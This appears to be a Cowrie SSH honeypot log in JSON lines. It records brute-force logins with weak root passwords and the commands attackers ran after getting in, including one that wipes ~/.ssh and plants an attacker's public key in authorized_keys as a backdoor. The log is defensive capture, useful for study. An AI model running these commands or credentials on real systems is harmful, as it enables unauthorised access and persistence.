{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:00.351641Z","src_ip":"212.227.125.160","session":"1d7b53f2fefa"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password","message":"login attempt [hadoop/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:40:00.965367Z","src_ip":"212.227.235.229","session":"41ed78f8db34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38910,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bd9ad6cea05","protocol":"ssh","message":"New connection: 212.227.125.160:38910 (1.2.3.4:22) [session: 7bd9ad6cea05]","sensor":"my-vps","timestamp":"2025-08-31T03:40:01.700085Z"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:02.799359Z","src_ip":"212.227.235.229","session":"41ed78f8db34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44746,"dst_ip":"1.2.3.4","dst_port":22,"session":"2062cce85f01","protocol":"ssh","message":"New connection: 212.227.125.160:44746 (1.2.3.4:22) [session: 2062cce85f01]","sensor":"my-vps","timestamp":"2025-08-31T03:40:16.032801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:40:16.478168Z","src_ip":"212.227.125.160","session":"2062cce85f01"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:40:16.478942Z","src_ip":"212.227.125.160","session":"2062cce85f01"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password","message":"login attempt [hadoop/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:40:18.480317Z","src_ip":"212.227.125.160","session":"2062cce85f01"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:19.950319Z","src_ip":"212.227.125.160","session":"2062cce85f01"}
{"eventid":"cowrie.session.closed","duration":"20.1","message":"Connection lost after 20.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:21.821716Z","src_ip":"212.227.125.160","session":"7bd9ad6cea05"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:40:34.222930Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e56b8ad3548","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: 1e56b8ad3548]","sensor":"my-vps","timestamp":"2025-08-31T03:40:44.718495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-31T03:40:44.824817Z","src_ip":"212.227.235.229","session":"1e56b8ad3548"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T03:40:44.930641Z","src_ip":"212.227.235.229","session":"1e56b8ad3548"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-31T03:40:46.037982Z","src_ip":"212.227.235.229","session":"1e56b8ad3548"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:46.039634Z","src_ip":"212.227.235.229","session":"1e56b8ad3548"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:40:47.514173Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:40:47.515163Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57398,"dst_ip":"1.2.3.4","dst_port":22,"session":"e21508783de3","protocol":"ssh","message":"New connection: 212.227.235.229:57398 (1.2.3.4:22) [session: e21508783de3]","sensor":"my-vps","timestamp":"2025-08-31T03:40:47.659008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:40:47.659899Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:40:47.968316Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.login.success","username":"root","password":"lsfadmin","message":"login attempt [root/lsfadmin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:40:49.602837Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:40:50.236401Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:40:50.237227Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:40:50.238010Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:50.547807Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:40:51.509838Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:40:51.510574Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:40:51.820832Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:51.821688Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57414,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aac261542c5","protocol":"ssh","message":"New connection: 212.227.235.229:57414 (1.2.3.4:22) [session: 3aac261542c5]","sensor":"my-vps","timestamp":"2025-08-31T03:40:52.153794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:40:52.154495Z","src_ip":"212.227.235.229","session":"3aac261542c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:40:52.483856Z","src_ip":"212.227.235.229","session":"3aac261542c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34378,"dst_ip":"1.2.3.4","dst_port":22,"session":"21d47709576a","protocol":"ssh","message":"New connection: 212.227.235.229:34378 (1.2.3.4:22) [session: 21d47709576a]","sensor":"my-vps","timestamp":"2025-08-31T03:40:53.966223Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:40:54.179050Z","src_ip":"212.227.235.229","session":"3aac261542c5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:40:54.729316Z","src_ip":"212.227.235.229","session":"21d47709576a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:40:54.730002Z","src_ip":"212.227.235.229","session":"21d47709576a"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:55.777863Z","src_ip":"212.227.235.229","session":"3aac261542c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47558,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a8ffd9dcfeb","protocol":"ssh","message":"New connection: 212.227.235.229:47558 (1.2.3.4:22) [session: 7a8ffd9dcfeb]","sensor":"my-vps","timestamp":"2025-08-31T03:40:56.097318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:40:56.097972Z","src_ip":"212.227.235.229","session":"7a8ffd9dcfeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:40:56.417095Z","src_ip":"212.227.235.229","session":"7a8ffd9dcfeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"9.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:57.228293Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.session.closed","duration":"74.0","message":"Connection lost after 74.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:57.229249Z","src_ip":"212.227.235.229","session":"ba71d37c2b06"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:40:58.034722Z","src_ip":"212.227.235.229","session":"7a8ffd9dcfeb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:58.355598Z","src_ip":"212.227.235.229","session":"7a8ffd9dcfeb"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:40:58.357798Z","src_ip":"212.227.235.229","session":"e21508783de3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password1","message":"login attempt [hadoop/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:41:00.679081Z","src_ip":"212.227.235.229","session":"21d47709576a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:02.493858Z","src_ip":"212.227.235.229","session":"21d47709576a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50868,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3407cb9b05","protocol":"ssh","message":"New connection: 212.227.235.229:50868 (1.2.3.4:22) [session: 2b3407cb9b05]","sensor":"my-vps","timestamp":"2025-08-31T03:41:05.500085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:41:07.008148Z","src_ip":"212.227.235.229","session":"2b3407cb9b05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:41:07.065951Z","src_ip":"212.227.235.229","session":"2b3407cb9b05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52688,"dst_ip":"1.2.3.4","dst_port":22,"session":"b09e9b1ce5a4","protocol":"ssh","message":"New connection: 212.227.125.160:52688 (1.2.3.4:22) [session: b09e9b1ce5a4]","sensor":"my-vps","timestamp":"2025-08-31T03:41:15.467047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:41:15.977318Z","src_ip":"212.227.125.160","session":"b09e9b1ce5a4"}
